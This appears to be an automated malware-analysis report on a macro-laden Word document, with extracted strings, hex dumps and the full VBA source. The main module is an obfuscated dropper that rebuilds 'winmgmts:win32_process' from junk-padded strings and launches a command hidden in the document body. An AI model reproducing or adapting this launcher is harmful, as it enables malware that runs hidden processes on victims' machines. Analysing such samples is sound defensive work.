                                                                                                                              ObUqEpuD
                                                                                                                              uWAjsYwtG
                                                                                                                              FzSmxUBI
                                                                                                                              YEAwF:
                                                                                                                              "dcEwJD.cZCpC.kfXrIC"
                                                                                                                              FEJNFPMF:
                                                                                                                              "uozeDEQ.xTczzpJbJ.GKYoFkDTH"
                                                                                                                              "NipqJ.tIztQI.WMXjaJ"
                                                                                                                              yDuIa:
                                                                                                                              IpXGAFACy:
                                                                                                                              "qKjdvEDq.lYfhW.eTVwADADD"
                                                                                                                              yDAMCG
                                                                                                                              ZqNrvaa
                                                                                                                              TLfxGCa
                                                                                                                              EiViHgGI
                                                                                                                              IJSGH
                                                                                                                              iAKfBEDC
                                                                                                                              TFhBESFIX:
                                                                                                                              GwJXIC
                                                                                                                              Error
                                                                                                                              "dZEvHBM.HWisMo.kLMoA"
                                                                                                                              "OqezBEGR.dKnPpE.XZiNID"
                                                                                                                              dThRBEAv
                                                                                                                              rDIcxFB
                                                                                                                              JKIoD
                                                                                                                              cIiApH:
                                                                                                                              QyqGnByH
                                                                                                                              ahjNCC
                                                                                                                              yDAMCG:
                                                                                                                              Close
                                                                                                                              jJMCQJDB
                                                                                                                              "WWgXBJbAL.psfjJF.iosTZOn"
                                                                                                                              yHCsJFACD:
                                                                                                                              ZxZNGGUBd
                                                                                                                              Function
                                                                                                                              FoTWuD
                                                                                                                              hVRJE:
                                                                                                                              "dCIAJyHr.uGSFGCFE.hgENI"
                                                                                                                              olbDbIA
                                                                                                                              OXtlEDLCd
                                                                                                                              zoqaA
                                                                                                                              "UqHHHBQRG.wPBFeBYHC.BFGBerA"
                                                                                                                              "cklcdFF.ljzQFAII.yhDYGICo"
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "Lxvinhyq0hu0i"
  Function Gdxyahu7r2bnouqu(G_vsoyetocf_q1hwst)
   GoTo kmOCpG
Dim lfjdHL As String
Open "ZbLbn.FiqyBGPC.ROWoCHF" For Binary As 230
Put #230, , lfjdHL
Close #230
kmOCpG:
GoTo RhecDCNb
Dim GLxLQDxBB As String
Open "WWgXBJbAL.psfjJF.iosTZOn" For Binary As 176
Put #176, , GLxLQDxBB
Close #176
RhecDCNb:
GoTo iAKfBEDC
Dim eYojg As String
Open "eKLzaJBKG.eCACJBH.NfdiGiC" For Binary As 76
Put #76, , eYojg
Close #76
iAKfBEDC:
Gdxyahu7r2bnouqu = VBA.Replace (G_vsoyetocf_q1hwst, "J" + ")(3" + "s2)" + "(", H9dyim0o_e1y2ad)
   GoTo PksXIAC
Dim bVAPDAD As String
Open "YNveE.qehAq.fHHuGb" For Binary As 214
Put #214, , bVAPDAD
Close #214
PksXIAC:
GoTo hckCCJvD
Dim oVlMEI As String
Open "UqHHHBQRG.wPBFeBYHC.BFGBerA" For Binary As 203
Put #203, , oVlMEI
Close #203
hckCCJvD:
GoTo IaIuovC
Dim HMJCGGAMi As String
Open "ObyEHIBL.hGKABcIQ.yeYrFAOmg" For Binary As 100
Put #100, , HMJCGGAMi
Close #100
IaIuovC:
End Function
Function Joieredaxt98oc6o()
On Error Resume Next
mn2b = Dk5att0cu_9jsb.StoryRanges.Item(1)
   GoTo nmHtBKNIA
Dim kaqktK As String
Open "fNHCB.hbEBBG.feKiwC" For Binary As 221
Put #221, , kaqktK
Close #221
nmHtBKNIA:
GoTo MVKdEA
Dim RZyrFJ As String
Open "cklcdFF.ljzQFAII.yhDYGICo" For Binary As 166
Put #166, , RZyrFJ
Close #166
MVKdEA:
GoTo lfRjBXXFA
Dim yJzxGZak As String
Open "KeuGF.APuwUHxl.GiUhBFB" For Binary As 105
Put #105, , yJzxGZak
Close #105
lfRjBXXFA:
mwb2 = "J)(3s2)(pJ)(3s2)("
Uytq7q8qmjumesrn6n = "J)(3" + "s2)(roJ)(3s2" + ")(J)(3s2)(ceJ)(3s2" + ")(sJ)(3s2)(sJ)(3s" + "2)(J)(3s2)("
   GoTo FzSmxUBI
Dim JubeVI As String
Open "NhKID.SYBhRIEGg.qCLeaM" For Binary As 150
Put #150, , JubeVI
Close #150
FzSmxUBI:
GoTo cIiApH
Dim JKIoD As String
Open "dZEvHBM.HWisMo.kLMoA" For Binary As 143
Put #143, , JKIoD
Close #143
cIiApH:
GoTo olbDbIA
Dim QyqGnByH As String
Open "NPkiDT.CkfBJvJ.bgnwZAB" For Binary As 115
Put #115, , QyqGnByH
Close #115
olbDbIA:
Po2ytmcrm_ypc = "J)(3s2)(" + ":wJ)(3s2)(J)(3s" + "2)(inJ)(3s2)(3J)(" + "3s2)(2J)(3s2)(_J)(3s2)("
   GoTo jJMCQJDB
Dim PrigNJEs As String
Open "BpfOu.TVoTOHe.EzrPEDJ" For Binary As 188
Put #188, , PrigNJEs
Close #188
jJMCQJDB:
GoTo yDuIa
Dim KAedr As String
Open "pJlGBGe.jIXSWL.jkAfAEIf" For Binary As 255
Put #255, , KAedr
Close #255
yDuIa:
GoTo fGzqP
Dim EiViHgGI As String
Open "pPiJFZzI.dfizGxy.NRcSrA" For Binary As 101
Put #101, , EiViHgGI
Close #101
fGzqP:
E4yx9bkuv6v1jxlzz = "wJ)(3s2)(i" + "nJ)(3s2)(mJ)(3s2)(gmJ)(3" + "s2)(tJ)(3s2)(J)(3s2)("
   GoTo YEAwF
Dim kySRBFED As String
Open "OqezBEGR.dKnPpE.XZiNID" For Binary As 184
Put #184, , kySRBFED
Close #184
YEAwF:
GoTo jWIUH
Dim wVgZExzI As String
Open "WWmJGCEWG.XCrNGJ.ficHzH" For Binary As 234
Put #234, , wVgZExzI
Close #234
jWIUH:
GoTo XvETIO
Dim FzOAw As String
Open "iYrsMDeBF.SIoiFJ.zdnAB" For Binary As 173
Put #173, , FzOAw
Close #173
XvETIO:
Aaq271x4j__7dcviuj = ChrW(wdKeyS)
   GoTo qLfbCLdC
Dim SEnkGD As String
Open "zSasAJg.LDOIU.vvZOFJ" For Binary As 233
Put #233, , SEnkGD
Close #233
qLfbCLdC:
GoTo yqztDCl
Dim AJXECAN As String
Open "cBBImVFtj.VfOyHcZeG.KTQGJQv" For Binary As 256
Put #256, , AJXECAN
Close #256
yqztDCl:
GoTo yDAMCG
Dim zoqaA As String
Open "AtMXEHJGF.tPVXDfJI.vNeXEIF" For Binary As 212
Put #212, , zoqaA
Close #212
yDAMCG:
Av35ujjoujldl9 = E4yx9bkuv6v1jxlzz + Aaq271x4j__7dcviuj + Po2ytmcrm_ypc + mwb2 + Uytq7q8qmjumesrn6n
   GoTo hVRJE
Dim IGamxCG As String
Open "zpGvEhCHv.ZNcWIJcU.qeFzJB" For Binary As 161
Put #161, , IGamxCG
Close #161
hVRJE:
GoTo VIuzQOE
Dim JxVVF As String
Open "aguCEDpx.XlUcBUj.UPogGhX" For Binary As 208
Put #208, , JxVVF
Close #208
VIuzQOE:
GoTo jSGTCFaK
Dim lOYxmwBA As String
Open "ErIlZF.tHbIE.idUJKwuOi" For Binary As 110
Put #110, , lOYxmwBA
Close #110
jSGTCFaK:
Xyc25um2qhx = Us5rvv097omc6(Av35ujjoujldl9)
   GoTo lbHAbDF
Dim iZGGBKjGH As String
Open "uozeDEQ.xTczzpJbJ.GKYoFkDTH" For Binary As 135
Put #135, , iZGGBKjGH
Close #135
lbHAbDF:
GoTo nhVWCG
Dim cHoJJlDBJ As String
Open "oScEJFIH.GpYhI.ZPvpk" For Binary As 150
Put #150, , cHoJJlDBJ
Close #150
nhVWCG:
GoTo TFhBESFIX
Dim OXtlEDLCd As String
Open "gjoHAq.pgiDH.iYppCzD" For Binary As 165
Put #165, , OXtlEDLCd
Close #165
TFhBESFIX:
Set Tbkimf15gklpyjuc5 = CreateObject(Xyc25um2qhx)
   GoTo dcClB
Dim uYPoFiE As String
Open "TNqlmI.VQzWNlJC.IuleF" For Binary As 98
Put #98, , uYPoFiE
Close #98
dcClB:
GoTo sbVXlJE
Dim YaqiI As String
Open "QWkiJ.sNlBSC.hsUWFP" For Binary As 145
Put #145, , YaqiI
Close #145
sbVXlJE:
GoTo UbSMfKFUj
Dim BRfTAJ As String
Open "rqFdfCgk.WuMsFCHq.wYpcBKVBP" For Binary As 236
Put #236, , BRfTAJ
Close #236
UbSMfKFUj:
U4fasjmuqzl8g4y9 = Mid(mn2b, (5), Len(mn2b))
   GoTo FoTWuD
Dim hkpqEBd As String
Open "AcrzGL.zwvmHG.MqsxCr" For Binary As 213
Put #213, , hkpqEBd
Close #213
FoTWuD:
GoTo VipWJ
Dim GwJXIC As String
Open "XIjXFFFIJ.jYAPtLTyj.PLtLFT" For Binary As 165
Put #165, , GwJXIC
Close #165
VipWJ:
GoTo yHCsJFACD
Dim eTuZIDG As String
Open "MiwKq.hkWsDcI.YmoTAGR" For Binary As 135
Put #135, , eTuZIDG
Close #135
yHCsJFACD:
   GoTo FEJNFPMF
Dim UFEneAQF As String
Open "NgFRIFlFQ.imXZAJE.tzzlC" For Binary As 153
Put #153, , UFEneAQF
Close #153
FEJNFPMF:
GoTo rDIcxFB
Dim EhrmhuB As String
Open "RSIiW.JGdvBjSmB.WubTFJ" For Binary As 118
Put #118, , EhrmhuB
Close #118
rDIcxFB:
GoTo xuAPcBl
Dim mxDIrHC As String
Open "NipqJ.tIztQI.WMXjaJ" For Binary As 202
Put #202, , mxDIrHC
Close #202
xuAPcBl:
Tbkimf15gklpyjuc5.Create Us5rvv097omc6(U4fasjmuqzl8g4y9), Xzrkngu1iuo6rwg, Np29qma1fg5ke
   GoTo pxMXSJrIc
Dim JzcNByvAX As String
Open "dCIAJyHr.uGSFGCFE.hgENI" For Binary As 133
Put #133, , JzcNByvAX
Close #133
pxMXSJrIc:
GoTo NwlcQEELI
Dim BrrXfI As String
Open "gEMlED.skZhEggk.ZyWBD" For Binary As 239
Put #239, , BrrXfI
Close #239
NwlcQEELI:
GoTo ZxZNGGUBd
Dim CtmaxWDYG As String
Open "bfJqAKr.cLEdAF.oYWiAFEQ" For Binary As 143
Put #143, , CtmaxWDYG
Close #143
ZxZNGGUBd:
   GoTo IIJMEYBZ
Dim ohdoz As String
Open "eHqqE.nCeMDET.kZWuQGE" For Binary As 147
Put #147, , ohdoz
Close #147
IIJMEYBZ:
GoTo aDFRF
Dim TLfxGCa As String
Open "hSzhx.onZqBBzG.aRYCE" For Binary As 269
Put #269, , TLfxGCa
Close #269
aDFRF:
GoTo zHYrT
Dim QqQRUOBIy As String
Open "BiUfo.vtUVwAWGC.hUSLqGGIO" For Binary As 194
Put #194, , QqQRUOBIy
Close #194
zHYrT:
End Function
Function Us5rvv097omc6(Wj34bkji64gbgi_p)
On Error Resume Next
   GoTo RMyrFd
Dim uJtiAP As String
Open "CXrJJB.OBfnW.uqEngDYV" For Binary As 206
Put #206, , uJtiAP
Close #206
RMyrFd:
GoTo ZqNrvaa
Dim dThRBEAv As String
Open "HGXMmlZoZ.jEXaTVE.zeocvMGG" For Binary As 207
Put #207, , dThRBEAv
Close #207
ZqNrvaa:
GoTo kMzKEr
Dim ahjNCC As String
Open "ZFWwdLJFE.FcQNSnyB.yuKyrJAD" For Binary As 93
Put #93, , ahjNCC
Close #93
kMzKEr:
Dbzgu9yuthixkrcjt = (Wj34bkji64gbgi_p)
   GoTo JXblRBK
Dim sCwjljF As String
Open "obWgmFILu.KLSrfFHDI.nylpN" For Binary As 185
Put #185, , sCwjljF
Close #185
JXblRBK:
GoTo uJknJZHFB
Dim WpdDxhHa As String
Open "DcfnrACC.XeVEC.QdSVCUJ" For Binary As 245
Put #245, , WpdDxhHa
Close #245
uJknJZHFB:
GoTo nCWvB
Dim NJlsEIS As String
Open "nYskWX.aOSpmAFIB.kCBksCD" For Binary As 209
Put #209, , NJlsEIS
Close #209
nCWvB:
Znr2e9ewo0wtxy = Gdxyahu7r2bnouqu(Dbzgu9yuthixkrcjt)
   GoTo gvnNjywC
Dim RWlYF As String
Open "cfmqZH.yHFfXEyD.iUezXEC" For Binary As 124
Put #124, , RWlYF
Close #124
gvnNjywC:
GoTo IpXGAFACy
Dim WnWcBBeF As String
Open "dcEwJD.cZCpC.kfXrIC" For Binary As 137
Put #137, , WnWcBBeF
Close #137
IpXGAFACy:
GoTo ObUqEpuD
Dim uWAjsYwtG As String
Open "qKjdvEDq.lYfhW.eTVwADADD" For Binary As 100
Put #100, , uWAjsYwtG
Close #100
ObUqEpuD:
Us5rvv097omc6 = Znr2e9ewo0wtxy
   GoTo ZuuLFE
Dim IJSGH As String
Open "DbRqLDGCg.nxwYCaF.sZZrJ" For Binary As 168
Put #168, , IJSGH
Close #168
ZuuLFE:
GoTo LjVfJ
Dim DxojDGC As String
Open "nRpjIJ.tkIcCAbCF.hJzbH" For Binary As 65
Put #65, , DxojDGC
Close #65
LjVfJ:
GoTo KiOKSNEG
Dim JHGODJK As String
Open "gtvUAW.KeNGGlEDI.FCFXBEHbH" For Binary As 177
Put #177, , JHGODJK
Close #177
KiOKSNEG:
End Function
                                                                                                                              VBA File Name: UserForm1, Stream Size: 1160
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm1
                                                                                                                              VBA File Name:UserForm1
                                                                                                                              Stream Size:1160
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 6e ff 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              False
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E4811F3D-9F01-4BC4-95D4-D40026D931D3}{41345D1C-9C4E-4385-B780-C54CCB7ABE17}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm2, Stream Size: 1155
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm2
                                                                                                                              VBA File Name:UserForm2
                                                                                                                              Stream Size:1155
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 a8 f8 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{AF4533AC-BBF6-4979-BA91-9D2D4959595A}{3CF58CA5-D4D4-49F7-BA7F-F124E45D0A17}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm3, Stream Size: 1159
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm3
                                                                                                                              VBA File Name:UserForm3
                                                                                                                              Stream Size:1159
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . ^ I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 5e 49 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{A4835EEF-81F1-4677-BAA3-01DF6CF2C26F}{ADE6D7C4-3411-4730-A534-6D8AAFEFBA8F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm4, Stream Size: 1160
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm4
                                                                                                                              VBA File Name:UserForm4
                                                                                                                              Stream Size:1160
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 57 91 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_Base
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{4FA002EA-017C-4E93-9C6B-22A1ABC6E370}{C27736E2-CDA0-4100-9FCF-E22B5D354CA0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm5, Stream Size: 1160
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm5
                                                                                                                              VBA File Name:UserForm5
                                                                                                                              Stream Size:1160
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 f9 39 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{B4698655-398F-452C-B828-35D501CBBA3E}{6D1A2E80-5267-422A-B1BA-58F578BA8D71}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                              VBA File Name: Vhr7vb1s1hgs, Stream Size: 681
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/Vhr7vb1s1hgs
                                                                                                                              VBA File Name:Vhr7vb1s1hgs
                                                                                                                              Stream Size:681
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . . . . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 11 c0 94 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "Vhr7vb1s1hgs"

                                                                                                                              Streams

                                                                                                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                              General
                                                                                                                              Stream Path:\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:114
                                                                                                                              Entropy:4.2359563651
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                              General
                                                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                                                              File Type:data
                                                                                                                              Stream Size:4096
                                                                                                                              Entropy:0.252421588676
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 496
                                                                                                                              General
                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                              File Type:data
                                                                                                                              Stream Size:496
                                                                                                                              Entropy:3.89869601257
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 70 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                                                                                                              Stream Path: 1Table, File Type: data, Stream Size: 7231
                                                                                                                              General
                                                                                                                              Stream Path:1Table
                                                                                                                              File Type:data
                                                                                                                              Stream Size:7231
                                                                                                                              Entropy:5.85333738879
                                                                                                                              Base64 Encoded:True
